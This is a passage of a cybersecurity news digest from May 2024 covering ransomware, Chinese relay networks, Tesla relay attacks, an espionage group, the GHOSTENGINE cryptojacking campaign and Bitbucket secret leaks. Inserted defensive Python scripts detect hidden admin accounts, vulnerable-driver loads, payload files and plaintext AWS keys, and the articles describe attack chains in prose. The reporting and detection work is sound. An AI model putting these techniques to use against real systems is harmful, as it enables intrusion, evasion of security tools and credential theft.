The Apache Software Foundation addressed this issue in January 2021 with the release of Flink versions 1.11.3 and 1.12.0. Users running affected versions are strongly urged to upgrade to secure their systems. CISA has mandated that federal agencies apply the necessary patches by June 13, 2024. This requirement operates under Binding Operational Directive (BOD) 22-01, which requires Federal Civilian Executive Branch (FCEB) agencies to remediate vulnerabilities listed in the Known Exploited Vulnerabilities catalog to protect agency networks against active threats. Although the directive applies only to FCEB agencies, CISA has urged all organizations to reduce their exposure by applying the mitigations in the catalog as per vendor instructions, or to discontinue use of affected products if mitigations are unavailable.

In 2022, a critical vulnerability discovered in Apache Commons Text potentially granted threat actors access to remote servers. While fixes were soon released for both vulnerabilities, these incidents highlight the importance of timely updates and patches for vulnerabilities in widely deployed open-source projects, frameworks and components.

Association of California School Administrators Reports Ransomware Attack

By: Alan J
24 May 2024 at 05:10

Association of California School Administrators Ransomware Attack

An unknown ransomware actor has compromised the personally identifiable data of more than 50,000 Californian school administrators, their association told Maine's Attorney General in a breach notice. The Association of California School Administrators (ACSA), the largest association for school leaders in the United States, said it spotted the data breach in September 2023, when an unauthorized actor accessed and potentially exfiltrated sensitive data.

Association of California School Administrators Ransomware Attack Investigation

The association's notice to the Maine Attorney General revealed that it first detected "encryption activity" indicative of a ransomware attack in its computer environment on September 24 last year. No threat group has yet claimed responsibility for the attack. The detection was followed by an investigation, aided by third-party cybersecurity experts, which confirmed unauthorized access to various ACSA systems over the two days following initial access. The threat actor was found to have potentially accessed and stolen sensitive data from the compromised systems. The association also worked to validate the results of the investigation and to locate missing address information. After ACSA completed the process of validating and identifying affected individuals on May 3, 2024, it began notifying all potentially affected individuals on May 22.

ACSA informed the Maine Attorney General that approximately 54,600 individuals were impacted by the incident, including 14 Maine residents. Impacted individuals were provided with specific details about the incident and the steps they could take to protect their personal information. The compromised files were found to contain sensitive data such as names, addresses, dates of birth, Social Security numbers, driver's license numbers, payment card information, medical information, health insurance details, tax IDs, student records (report cards and test scores), employer-assigned identification numbers and online account credentials.

Recommendations and Additional Resources to Affected Individuals

In response to the breach, ACSA notified federal law enforcement, implemented additional security measures such as employee training, and provided guidance to affected individuals on protecting themselves from associated risks such as identity theft and fraud. The association stated that there was no evidence of identity theft or fraud resulting from the event. However, as a precautionary measure, it is offering 12 months of credit monitoring services to affected individuals at no cost. These services include credit and CyberScan monitoring, a million-dollar insurance reimbursement policy and fully managed identity theft recovery services. ACSA encouraged affected individuals to enroll in these services before the deadline of August 22, 2024. ACSA advises all affected individuals to monitor their accounts and credit reports for unauthorized activity, stating that it takes the privacy and security of the sensitive information in its care seriously and regrets any inconvenience the incident has caused. The guidance also includes instructions on reporting suspicious activity to banks and credit card companies, placing fraud alerts and credit freezes on credit files, and obtaining the free credit reports available under U.S. law. ACSA is also encouraging individuals to report any incidents of identity theft to the Federal Trade Commission, state attorneys general and law enforcement.

Chinese Threat Actors Employ Operational Relay Box (ORB) Networks to Evade IOCs

By: Alan J
23 May 2024 at 09:15

ORB Networks China

Cybersecurity defenders have long relied on blocking attacker IP addresses identified through IOCs in response to threat actor campaigns. However, Chinese threat actors are rapidly rendering this strategy obsolete through the widespread adoption of ORB networks. ORBs are complex, multi-layered networks, typically managed by private companies or entities within the Chinese government, that offer access to a constantly shifting pool of IP addresses and allow multiple threat actors to mask their activities behind seemingly innocuous traffic.

Use of ORB Networks by Threat Actors Present Additional Challenges to Defenders

Researchers from Mandiant stated that the sheer size and scope of these networks, often hundreds of thousands of nodes deep, provide a great deal of cover and make it difficult for defenders to attribute and learn more about attackers. Additionally, the geographic spread of ORBs allows hackers in China to circumvent geographic restrictions or appear less suspicious by connecting to targets from within the target's own region. Most importantly, ORB nodes are short-lived, with devices typically cycled in and out every month or every few months, making it difficult for defenders to tie IPs to their users for any useful length of time.

These operational relay box networks are maintained by private companies or elements within the Chinese government and are made up of five layers: Chinese servers, virtual private servers (VPS), traversal nodes, exit nodes and victim servers. ORBs can be classified into two groups: provisioned networks, built on commercially rented VPSs, and non-provisioned networks, built on compromised and end-of-life routers and Internet of Things (IoT) devices. These networks are akin to botnets; ORB network administrators can grow the size of their network with little effort and create a constantly evolving mesh network that can be used to conceal espionage operations. The researchers cited two prominent examples to illustrate the sophistication of these networks:
  • ORB3/SPACEHOP: A provisioned network linked to APT5 and APT15, targeting entities in North America, Europe, and the Middle East. Known for exploiting vulnerabilities like CVE-2022-27518.
  • ORB2/FLORAHOX: A hybrid network built from compromised Cisco, ASUS and DrayTek routers alongside Tor relays and VPS servers. Linked to APT31 (also tracked as Zirconium), it demonstrates a multi-layered approach to traffic obfuscation.

Adapting to the Threat of ORB Networks

Researchers have advised that, instead of simply blocking adversary infrastructure, defenders must now consider temporality, the multiplicity of adversaries and ephemerality. They recommend treating ORB networks as distinct entities with their own tactics, techniques and procedures (TTPs) rather than relying on inert indicators of compromise. By analyzing their evolving characteristics, including infrastructure patterns, behaviors and TTPs, defenders can gain valuable insight into the adversary's tactics and develop more effective defenses. While using proxy networks to obfuscate attacks is not new, the rise of the ORB network industry in China points to long-term investment in equipping cyber operators with more sophisticated tactics and tools. The evolution of these ORB networks also highlights that a static defense may be a losing defense. To counter this growing threat and level the playing field, enterprises must embrace a mindset of continuous adaptation while investing in advanced threat intelligence, behavioral analysis tools and skilled personnel.

Tesla’s Ultra-Wideband Still Vulnerable to Relay Attacks Despite Upgrades

By: Alan J
23 May 2024 at 09:05

Tesla's Ultra-Wideband Relay Attacks

A new study reveals that the keyless entry system in Tesla's latest Model 3 remains vulnerable to relay attacks despite its upgrade to ultra-wideband (UWB) radio, which had been touted as a solution to such attacks. A relay attack tricks a car into unlocking by relaying signals from an owner's key fob or smartphone, often from a distance. The technique has been used to steal numerous car models for years, as it makes the car's entry system respond as if the real owner were nearby.

Relay Attacks Remain a Concern for Ultra-Wideband Keyless Systems

For over a decade, car thieves have used relay attacks to steal vehicles with keyless entry systems. The technique, which requires minimal equipment, has remained a significant threat despite advances in car security technology. Ultra-wideband technology was touted by some as a fix and a possible end to relay attacks, with a pending patent filed by Ford Global Technologies LLC (an R&D subsidiary of Ford Motor) describing it as the 'most advanced known solution to relay attacks'.

(Image: Ford patent filing describing UWB as a solution to relay attacks. Source: patents.google.com)

However, recent research from cybersecurity firm GoGoByte reveals that some of the latest high-end cars incorporating ultra-wideband, such as the Tesla Model 3, remain vulnerable. The researchers demonstrated a successful relay attack against the latest Tesla Model 3 despite its UWB upgrade, using less than $100 worth of radio equipment to unlock the car instantly. This is particularly concerning because the keyless entry system also controls the car's immobilizer, which prevents the engine from starting until the right key is recognized, so a successful attack potentially lets an attacker drive away with the car.

PIN-to-Drive Feature Advised as Critical Safeguard

In 2021, documents said to originate from a Tesla filing with the US Federal Communications Commission detailed the implementation of the ultra-wideband technology and described it as immune to relay attacks. The founder of the cybersecurity firm nevertheless emphasized the importance of enabling Tesla's optional PIN-to-drive feature. When enabled, this option requires a four-digit security code to be entered before the car can be driven, serving as a crucial defense against relay attacks: an attacker who relays the unlock still cannot drive off without the PIN.

According to the Wired report, Tesla responded to an email about the researchers' findings by acknowledging the issue but stating that the behavior was as expected: the ultra-wideband technology was not intended to stop relay attacks or to prevent car theft. The company said it was working on improving the reliability of the technology and that ranging enforcement would be implemented once the reliability upgrades were completed. The researchers noted that at least two other carmakers implementing UWB in their cars faced the same vulnerability. Noting Tesla's ability to push over-the-air (OTA) updates to its cars, the researchers said a future update could contain a fix for relay attacks, but they believed the public should be aware of the issue and should realize they were far from immune until then.
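To make the "ranging enforcement" point concrete, here is an added example (not code from GoGoByte, Tesla or the article) of how a UWB two-way-ranging check would reject a relayed key. The physics is what makes it work: a relay can only lengthen the round trip, never shorten it, so the distance the car computes from time of flight grows rather than shrinks. The key turnaround (500 ns), the relay overhead (2 µs), the 20 m true distance and the 3 m unlock radius are assumed illustrative values, not Tesla's parameters, and the scenarios are constructed.

```python
# Speed of light, metres per nanosecond.
C_M_PER_NS = 0.299792458


def simulate_rtt_ns(key_distance_m, reply_delay_ns, relay_overhead_ns=0.0):
    """Round-trip time the car measures for a key that is physically key_distance_m away.

    Honest exchange: 2 * time-of-flight + the key's fixed turnaround (reply_delay_ns).
    Relay attack: the radio signal still has to travel the real distance to the key and
    back, and the relay boxes add their own receive/retransmit latency on top. Nothing
    in the attacker's setup can make the round trip shorter than the honest one.
    """
    time_of_flight_ns = key_distance_m / C_M_PER_NS
    return 2.0 * time_of_flight_ns + reply_delay_ns + relay_overhead_ns


def measured_distance_m(rtt_ns, reply_delay_ns):
    """Two-way ranging estimate: subtract the known turnaround, halve, convert to metres."""
    return C_M_PER_NS * (rtt_ns - reply_delay_ns) / 2.0


def unlock_decision(rtt_ns, reply_delay_ns, max_unlock_m, enforce_ranging):
    """'unlock' or 'deny'. With enforce_ranging=False the car authenticates the key but
    ignores the distance, which is the behaviour the article attributes to the current
    Model 3 firmware; with it enabled, the measured distance gates the unlock."""
    if not enforce_ranging:
        return "unlock"
    distance = measured_distance_m(rtt_ns, reply_delay_ns)
    return "unlock" if 0.0 <= distance <= max_unlock_m else "deny"


# Illustrative parameters (assumptions, not Tesla's values).
REPLY_DELAY_NS = 500.0      # key's fixed turnaround time
RELAY_OVERHEAD_NS = 2000.0  # two relay boxes capturing and re-emitting the UWB frames
MAX_UNLOCK_M = 3.0          # car only unlocks for keys within this radius


def scenarios():
    """Owner standing 1.5 m from the car versus a key 20 m away reached through a relay."""
    honest_rtt = simulate_rtt_ns(1.5, REPLY_DELAY_NS)
    relayed_rtt = simulate_rtt_ns(20.0, REPLY_DELAY_NS, RELAY_OVERHEAD_NS)
    return {
        "honest_distance_m": round(measured_distance_m(honest_rtt, REPLY_DELAY_NS), 2),
        "relayed_distance_m": round(measured_distance_m(relayed_rtt, REPLY_DELAY_NS), 2),
        "honest_enforced": unlock_decision(honest_rtt, REPLY_DELAY_NS, MAX_UNLOCK_M, True),
        "relay_enforced": unlock_decision(relayed_rtt, REPLY_DELAY_NS, MAX_UNLOCK_M, True),
        "relay_unenforced": unlock_decision(relayed_rtt, REPLY_DELAY_NS, MAX_UNLOCK_M, False),
    }


if __name__ == "__main__":
    for name, value in scenarios().items():
        print(f"{name}: {value}")
```

Even a near-zero-overhead relay does not help the attacker: the key is still 20 m from the car, so the round trip already corresponds to 20 m before any relay latency is added, which is why the check denies the unlock whenever it is actually enforced.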

Threat Actor β€œUnfading Sea Haze” Targeting South China Sea Nations

By: Alan J
23 May 2024 at 05:13

South China Sea Unfading Sea Haze

A recently discovered cyber threat actor, dubbed 'Unfading Sea Haze', has been targeting organizations in the South China Sea region since 2018. The threat actor group remained undetected for over five years, despite its attacks on several high-profile military and government entities. Researchers observed that its operations align with Chinese geopolitical interests in the region.

Unfading Sea Haze Likely Affiliated with Chinese Government

Bitdefender researchers found that the group's TTPs (tactics, techniques and procedures) and toolset overlap with those of other Chinese state-sponsored threat actors such as APT41 (BARIUM). Unfading Sea Haze employs a multi-stage attack chain, often beginning with spear-phishing emails carrying malicious LNK files disguised within seemingly innocuous documents. When an LNK file is opened, a lengthy obfuscated PowerShell command checks for the presence of an ESET executable (ekrn.exe). If it is found, the attack halts; otherwise, the PowerShell script compiles the malware directly in memory using Microsoft's legitimate msbuild.exe command-line build tool.

The attackers use scheduled tasks to side-load malicious DLLs and modify the disabled default administrator account to maintain persistence. They reset the password of the local administrator account, enable it and hide it from the login screen via Registry modifications, giving the threat actors a hidden administrator account for further attacks. Once access is established, Unfading Sea Haze uses a custom keylogger named 'xkeylog' to capture keystrokes, a browser-data stealer to target data stored by Chrome, Firefox or Edge, and various PowerShell scripts to extract information from browser databases.

Unfading Sea Haze's campaign employs a wide arsenal of custom-developed malware and publicly available tools. The group's initial campaigns used tools such as the xkeylog keylogger for credential theft and SharpJSHandler, a web shell alternative for remote code execution. The group later shifted towards stealthier options, such as iterations of the Gh0st RAT malware family including SilentGh0st, TranslucentGh0st and newer, more modular variants like FluffyGh0st, InsidiousGh0st and EtherealGh0st. This shift demonstrates an ongoing effort to adapt the toolkit for maximum effectiveness and evasion.
Unfading Sea Haze also uses commercial Remote Monitoring and Management (RMM) tools, such as Itarian RMM, in the attack chain to establish a foothold on compromised networks.
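An added example (not Bitdefender's code or tooling from its report) of how a defender could check a Windows host for the two persistence artefacts described above, the hidden administrator account and the scheduled tasks, from exported data rather than live queries. It assumes the account is hidden via the Winlogon SpecialAccounts\UserList registry key, the usual mechanism for hiding an account from the logon screen (the report does not name the key), and takes `reg export` and `schtasks /query /fo CSV /v` output as input. Both samples are constructed; the user-writable-path and msbuild.exe rules are generic heuristics motivated by the side-loading and in-memory compilation the report describes.

```python
import csv
import io
import re

# Winlogon key whose DWORD entries control which local accounts the logon screen lists:
# a value of 0 hides the account. Assumed here as the mechanism behind "hidden from the
# login screen via Registry modifications"; the report itself does not name the key.
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")

# Paths and binaries worth a second look when they appear in a scheduled task command:
# user-writable directories (where a side-loaded DLL and its host EXE can be dropped
# without admin rights) and msbuild.exe, which the report says compiles the payload in memory.
WRITABLE_DIRS = ("\\users\\public\\", "\\appdata\\", "\\programdata\\", "\\temp\\")
BUILD_BINARIES = ("msbuild.exe",)


def hidden_accounts(reg_export_text):
    """Return account names hidden from the logon screen, parsed from `reg export` output."""
    hidden = []
    in_userlist = False
    for raw in reg_export_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_userlist = line[1:-1].lower() == USERLIST_KEY.lower()
            continue
        if not in_userlist:
            continue
        m = re.match(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
        if m and int(m.group(2), 16) == 0:
            hidden.append(m.group(1))
    return hidden


def suspicious_tasks(schtasks_csv):
    """Return (task name, reasons) for tasks from `schtasks /query /fo CSV /v` output whose
    command runs from a user-writable directory or invokes a build binary."""
    flagged = []
    for row in csv.DictReader(io.StringIO(schtasks_csv.strip())):
        command = (row.get("Task To Run") or "").lower()
        reasons = []
        if any(d in command for d in WRITABLE_DIRS):
            reasons.append("runs from user-writable path")
        if any(b in command for b in BUILD_BINARIES):
            reasons.append("invokes build binary")
        if reasons:
            flagged.append((row["TaskName"], reasons))
    return flagged


# Constructed samples (not captures from a compromised host).
SAMPLE_REG = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"Administrator"=dword:00000000
"svc_backup"=dword:00000000
"HelpAssistant"=dword:00000001
"""

SAMPLE_SCHTASKS = r"""
"HostName","TaskName","Next Run Time","Status","Logon Mode","Last Run Time","Last Result","Author","Task To Run"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","N/A","Ready","Interactive/Background","N/A","0","Microsoft Corporation","%windir%\defrag.exe -c -h -o -$"
"WS01","\OfficeUpdateCheck","5/24/2024 9:00:00 AM","Ready","Interactive/Background","5/23/2024 9:00:00 AM","0","WS01\Administrator","C:\Users\Public\Libraries\onedrv\OneDrive.exe"
"WS01","\SyncHelper","5/24/2024 9:05:00 AM","Ready","Interactive/Background","5/23/2024 9:05:00 AM","0","WS01\Administrator","C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\ProgramData\cache\build.proj"
"""

if __name__ == "__main__":
    print("hidden accounts:", hidden_accounts(SAMPLE_REG))
    for name, reasons in suspicious_tasks(SAMPLE_SCHTASKS):
        print(name, "->", ", ".join(reasons))
```

The UserList key does not exist on a default install, so any entry under it deserves a look; the built-in Administrator appearing there with a value of 0 is exactly the "enabled but invisible" state the report describes.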

Unfading Sea Haze Shares Similarities with APT41

Adding to the concern, the investigation revealed Unfading Sea Haze's repeated success in regaining access to previously compromised systems. This persistence points to a weakness often exploited by malicious actors: poor credential hygiene and inadequate patching practices within targeted organizations. Researchers suggest the group's use of various Gh0st RAT variants could imply a close connection to the Chinese threat actor ecosystem, where closed-source RATs and tools are commonly shared among state-sponsored actors. The campaign's use of the SharpJSHandler module to execute scripts shares similarities with the invoke command found in the funnyswitch backdoor, which APT41 has frequently employed in its campaigns: both SharpJSHandler and funnyswitch load .NET assemblies and execute JScript code. However, these similarities are limited, as funnyswitch contains additional features not present in SharpJSHandler, and no further overlaps with APT41's tooling were discovered during the investigation.

Researchers Share Recommendations

Researchers note that the Unfading Sea Haze group has demonstrated a high level of sophistication in its attacks, using a custom malware arsenal for additional flexibility and evasiveness. The shift towards modularity, dynamic elements and in-memory execution indicates the group's continuous efforts to circumvent traditional security measures. As attackers persistently adapt their tactics, researchers recommend a comprehensive, layered security approach for likely targets, including vulnerability management, strong authentication, network segmentation, traffic monitoring and effective logging. Researchers have also shared IOC (indicator of compromise) information on the campaign, such as associated IP addresses, domains, MD5 file hashes and file paths. Additionally, the researchers have linked to a full report featuring an in-depth look at the Gh0st RAT family and other malware samples.

New Cryptojacking Campaign Exploits Vulnerable Drivers to Evade Security and Gain Privileges

By: Alan J
22 May 2024 at 10:46

BYOVD GHOSTENGINE payload

Cybersecurity researchers have uncovered a sophisticated cryptojacking campaign that leverages vulnerable drivers to disable well-known security solutions and thereby evade detection. This technique, which allows attackers to perform privileged actions by exploiting known flaws in signed drivers, is referred to as a Bring Your Own Vulnerable Driver (BYOVD) attack.

Campaign Deploys GHOSTENGINE Payload

Researchers from Elastic Security Labs identified the new cryptojacking campaign, which they refer to as REF4578. The campaign uses the GHOSTENGINE core payload to deactivate security tools, complete the initial infection and execute a crypto-miner. Researchers from Antiy Labs also observed the campaign, referring to it as HIDDEN SHOVEL. The campaign was found to primarily target servers in China, with significant impact also reported in Hong Kong, the Netherlands, Japan, the U.S., Germany, South Africa and Sweden. The exact scope of the campaign and the identity of the threat actors behind it remain unknown.

The attack begins with the execution of an executable named "Tiworker.exe", which masquerades as a legitimate Windows file. This executable runs a PowerShell script that retrieves an obfuscated script called "get.png" from the attacker's command-and-control (C2) server. The "get.png" script then attempts several actions, such as disabling Microsoft Defender Antivirus, clearing the Windows System and Security event logs and creating scheduled tasks for persistence. The script also checks for a minimum of 10 MB of free storage before downloading additional malicious modules, including:
  • aswArPot.sys: A vulnerable Avast driver used to terminate EDR processes.
  • IObitUnlockers.sys: A vulnerable IObit driver used to delete security agent binaries.
  • smartsscreen.exe: The core payload (GHOSTENGINE) responsible for deactivating security processes and executing the XMRig miner.
  • oci.dll: A DLL used for persistence and updating the malware.
  • backup.png: A PowerShell script functioning as a backdoor for remote command execution.
  • kill.png: A PowerShell script designed to inject and load an executable file to delete security agents.
The PowerShell script creates multiple scheduled tasks to ensure persistence:
  • "OneDriveCloudSync" runs a malicious service DLL every 20 minutes.
  • "DefaultBrowserUpdate" runs a batch script every hour.
  • "OneDriveCloudBackup" executes "smartsscreen.exe" every 40 minutes.
Subsequently, the XMRig miner is downloaded and executed to mine cryptocurrency. XMRig is a legitimate, high-performance open-source application for mining the Monero cryptocurrency and is commonly abused by threat actors. A configuration file directs all mined cryptocurrency to an attacker-controlled wallet. The campaign incorporates several fallback mechanisms to ensure continued operation: if the primary C2 domains are unavailable, it uses backup servers and an FTP-based fallback. The PowerShell script "kill.png" provides redundancy, having capabilities similar to "smartsscreen.exe" for deleting security agent binaries. The malware also uses a DLL ("oci.dll") loaded by a Windows service to maintain additional persistence and download further updates from the C2 server.

Attackers Employ BYOVD Technique To Escalate Privileges and Evade Detection

The drivers exploited in the campaign run at ring 0, the highest privilege level offered by the operating system, allowing direct access to critical system resources. The threat actors exploit the Avast driver "aswArPot.sys" to terminate security processes and the IObit driver "IObitUnlockers.sys" to delete security agent binaries. Because the attack evades Endpoint Detection and Response (EDR) systems, security teams defending against this campaign should monitor for unusual PowerShell execution, suspicious process activity and network traffic to the identified crypto-mining pools. The researchers have provided YARA rules to help identify GHOSTENGINE infections. Additionally, organizations should consider blocking the creation of files by vulnerable drivers such as "aswArPot.sys" and "IObitUnlockers.sys." The level of sophistication demonstrated in the REF4578/HIDDEN SHOVEL cryptojacking campaign makes it a cause for concern and demands urgent remedial action.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
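As an added illustration (not part of the original report or the researchers' YARA rules), the Python below triages simplified Windows Security and Sysmon event records for the behaviours described above: the three persistence task names, the two vulnerable drivers, Security log clearing, execution of the named modules, and a Tiworker.exe that runs from an unexpected location. The record fields and sample events are constructed; the Tiworker.exe path heuristic and the PowerShell command-line pattern are assumptions, not indicators from the report.

```python
"""Triage of constructed Windows event records for the GHOSTENGINE/REF4578
behaviours named in the report: persistence task names, BYOVD driver loads,
Security log clearing, module execution and a masqueraded Tiworker.exe.
Event IDs used: Security 4698 (scheduled task created), Security 1102
(audit log cleared), Sysmon 1 (process created), Sysmon 6 (driver loaded)."""
import re

# Scheduled task names registered by the campaign (from the report).
SUSPICIOUS_TASKS = {"OneDriveCloudSync", "DefaultBrowserUpdate", "OneDriveCloudBackup"}
# Vulnerable drivers abused to kill EDR processes / delete agent binaries (from the report).
VULNERABLE_DRIVERS = {"aswarpot.sys", "iobitunlockers.sys"}
# Module and payload file names named in the report.
PAYLOAD_FILES = {"smartsscreen.exe", "get.png", "backup.png", "kill.png", "oci.dll"}
# Assumed heuristic: PowerShell launched with a hidden window or an encoded command.
SUSPICIOUS_PS = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+\S)")


def _basename(path):
    """File name component of a Windows path, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(ev):
    """Return (severity, reason) for one event, or None if nothing matched."""
    src, eid = ev.get("source"), ev.get("event_id")
    if src == "Security" and eid == 4698:
        task = ev.get("task_name", "").lstrip("\\")
        if task in SUSPICIOUS_TASKS:
            return ("high", f"GHOSTENGINE persistence task created: {task}")
    elif src == "Security" and eid == 1102:
        return ("medium", "Security event log cleared")
    elif src == "Sysmon" and eid == 6:
        if _basename(ev.get("image_loaded", "")) in VULNERABLE_DRIVERS:
            return ("high", f"known-vulnerable driver loaded: {ev['image_loaded']}")
    elif src == "Sysmon" and eid == 1:
        image = ev.get("image", "")
        name = _basename(image)
        if name in PAYLOAD_FILES:
            return ("high", f"GHOSTENGINE module executed: {name}")
        # Assumption: the genuine Tiworker.exe lives under the Windows directory.
        if name == "tiworker.exe" and not image.lower().startswith("c:\\windows\\"):
            return ("high", f"Tiworker.exe running outside the Windows directory: {image}")
        if name == "powershell.exe" and SUSPICIOUS_PS.search(ev.get("command_line", "")):
            return ("medium", "PowerShell started hidden or with an encoded command")
    return None


def triage(events):
    """Run check_event over every record; return [(host, severity, reason), ...]."""
    findings = []
    for ev in events:
        hit = check_event(ev)
        if hit:
            findings.append((ev.get("host"), hit[0], hit[1]))
    return findings


# Constructed sample records: srv01 shows the infection chain, srv02 is benign.
SAMPLE_EVENTS = [
    {"host": "srv01", "source": "Sysmon", "event_id": 1,
     "image": r"C:\Users\Public\Tiworker.exe", "command_line": "Tiworker.exe"},
    {"host": "srv01", "source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -w hidden -NoProfile -File C:\Users\Public\get.ps1"},
    {"host": "srv01", "source": "Security", "event_id": 1102},
    {"host": "srv01", "source": "Security", "event_id": 4698, "task_name": r"\OneDriveCloudSync"},
    {"host": "srv01", "source": "Sysmon", "event_id": 6, "image_loaded": r"C:\Windows\Temp\aswArPot.sys"},
    {"host": "srv01", "source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\Temp\smartsscreen.exe", "command_line": "smartsscreen.exe"},
    {"host": "srv02", "source": "Security", "event_id": 4698,
     "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag"},
    {"host": "srv02", "source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\WinSxS\<servicing-stack-dir>\TiWorker.exe",
     "command_line": "TiWorker.exe -Embedding"},
]

if __name__ == "__main__":
    for host, sev, reason in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {host}: {reason}")
```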

Threat Actors Exploited Bitbucket Artifacts to Expose AWS Secrets in Plaintext

By: Alan J
22 May 2024 at 06:50

Bitbucket Artifacts AWS Secrets

Researchers discovered that a flaw in Atlassian's Bitbucket code repository tool allowed threat actors to breach AWS accounts using authentication secrets that were leaked in plaintext in Bitbucket artifacts. Bitbucket provides a way to store variables so that developers can quickly reference them when writing code. Administrators can also mark variables as "secured" in Bitbucket Pipelines to prevent their values from being read in plain text. However, the recently discovered flaw could cause artifact objects generated during pipeline runs to expose these secured variables in plaintext.

BitBucket Artifacts Contain Secrets in Plaintext

The Bitbucket Pipelines CI/CD service integrated within Bitbucket uses artifact objects to store variables, files, and directories for use in subsequent stages of the build and testing process. Bitbucket's "Secured Variables" feature is stated to store sensitive information such as AWS keys securely, as they are encrypted within the Bitbucket environment, preventing direct access to and logging of their values. Developers employ the printenv command to dump all environment variables, including secured variables, into a text file, which is then included in an artifact object. However, researchers from Mandiant discovered a critical flaw in this system: artifact objects generated during pipeline runs contain these secured variables in plaintext. As developers are unaware that these secrets are exposed in artifact files, they may inadvertently push the secret values to public repositories, where threat actors can steal them. The researchers state that a threat actor could simply open the text file artifacts to view sensitive variables in plaintext, easily stealing authentication secrets that can then be used to steal data or perform other malicious activity. The researchers noted instances where development teams used Bitbucket artifacts in web application source code for troubleshooting, unknowingly exposing plaintext values of secret keys. This led to the exposure of these keys on the public internet, allowing attackers to leverage them for unauthorized access.

Researchers Share Guide on Replicating BitBucket Vulnerability

The researchers shared step-by-step instructions for recreating the leak of secrets within a Bitbucket environment as proof of the vulnerability. These steps included defining a secured variable, updating the bitbucket-pipelines.yml file to create an environment artifact, and downloading and accessing the artifact to view the exposed secrets. The researchers shared the following recommendations to protect Bitbucket Pipelines secrets:
  • Storing secrets in a dedicated secrets manager and then referencing those variables in the code stored in your Bitbucket repository.
  • Closely reviewing Bitbucket artifact objects to ensure they are not exposing secrets as plain text files.
  • Deploying code scanning throughout the full lifecycle of your pipeline to catch secrets stored in code before they are deployed to production.
However, the researchers stated that the findings were not an indictment of Bitbucket but rather an observation of how quickly seemingly harmless behaviour can snowball into critical security problems.
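As an added illustration of the artifact review the researchers recommend (this is not Mandiant's or Atlassian's code), the Python below scans a constructed printenv dump of the kind that ends up in a Bitbucket artifact, flags any secured variable or AWS-key-shaped value written in plaintext, and produces a filtered copy with those lines removed. The variable names, the artifact contents and the AWS key pair (the example credentials published in AWS documentation) are constructed.

```python
"""Review of a Bitbucket artifact for secured variables leaked in plaintext.
A pipeline step that runs `printenv > env.txt` and publishes env.txt as an
artifact writes every secured variable into the file unmasked; this scanner
finds those lines and builds a copy that is safe to keep as an artifact.
All names and values below are constructed."""
import re

# AWS access key IDs: AKIA (long-term) or ASIA (temporary) + 16 upper-case alphanumerics.
AWS_KEY_ID_RE = re.compile(r"\b(AKIA|ASIA)[A-Z0-9]{16}\b")

# Variables declared as "Secured" in the repository's pipeline settings (constructed).
SECURED_VARIABLES = {"AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "DB_PASSWORD"}

# Constructed printenv output as it would appear inside the artifact env.txt
# (the AWS pair is the example credential pair published in AWS documentation).
ARTIFACT_ENV_TXT = """\
PATH=/usr/local/bin:/usr/bin:/bin
BITBUCKET_BUILD_NUMBER=42
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
DB_PASSWORD=constructed-password
DEPLOY_ENV=staging
"""


def _split_env_line(line):
    """Split 'NAME=value' into (name, value); returns (None, None) for other lines."""
    name, sep, value = line.partition("=")
    if not sep or not name.strip():
        return None, None
    return name.strip(), value


def scan_artifact(text, secured=SECURED_VARIABLES):
    """Return [(line_no, variable, reason), ...] for every exposed secret."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        name, value = _split_env_line(line)
        if name is None:
            continue
        if name in secured and value:
            findings.append((no, name, "secured variable written in plaintext"))
        elif AWS_KEY_ID_RE.search(value):
            # Catches keys that were never marked as secured in the first place.
            findings.append((no, name, "value looks like an AWS access key ID"))
    return findings


def filtered_env(text, secured=SECURED_VARIABLES):
    """Copy of the dump with secured and key-shaped lines removed entirely."""
    kept = []
    for line in text.splitlines():
        name, value = _split_env_line(line)
        if name is not None and (name in secured or AWS_KEY_ID_RE.search(value)):
            continue
        kept.append(line)
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for no, name, reason in scan_artifact(ARTIFACT_ENV_TXT):
        print(f"env.txt:{no}: {name}: {reason}")
    print("safe copy:\n" + filtered_env(ARTIFACT_ENV_TXT))
```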

Rockwell Automation Urged Customers to Keep ICS Away from the Internet

By: Alan J
22 May 2024 at 03:04

Rockwell Automation

Rockwell Automation has urged customers to immediately disconnect all industrial control systems facing the public Internet. The company cites increasing malicious activity amid mounting geopolitical tensions worldwide as the reason for this recommendation.

The company advised customers to disconnect devices not specifically meant to face the public internet such as its cloud and edge offerings. Air gapping ICS systems from the public-facing internet can significantly reduce the attack surface of the organizations and protect their critical infrastructure from cyber threats, an advisory from the company suggested.

